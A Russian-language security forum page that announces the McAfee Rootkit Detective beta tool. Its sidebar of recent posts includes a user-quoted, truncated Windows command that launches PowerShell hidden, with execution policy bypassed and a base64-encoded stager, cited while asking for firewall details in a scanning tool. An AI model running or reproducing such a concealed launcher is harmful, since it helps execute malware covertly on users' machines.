Перейти к содержанию
Mike

McAfee® Rootkit Detective Beta

Recommended Posts

Mike

McAfee® Rootkit Detective is a standalone tool for proactively detecting existing and future rootkits. Rootkit Detective allows users to clean and remove rootkits from their systems.

249F.rar

249F.rar

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lemmit

Больше детективов хороших и разных! :D

Только лично меня от дизайна Маккафи всегда мутило(красное с синим)... И от "удобства" работы с ним.

Еще бы ссылку на оргинальный материал вместо архива с *.mht и русский текст автора.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mike
Больше детективов хороших и разных! :D

Еще бы ссылку на оргинальный материал вместо архива с *.mht и русский текст автора.

ссыла: http://vil.nai.com/vil/stinger/rkstinger.aspx

а русского текста не будет.

если пользователь не владеет азами английского языка, то ему незачем пользоваться англоязычным софтом.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lemmit

За ссылку спасибо!

Эх, хорошо, что Майя руткитами не увлекались! А то пришлось бы их иегорлифы расшифровывать.

http://www.mesoamerica.ru/indians/maya/dictionary.html

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×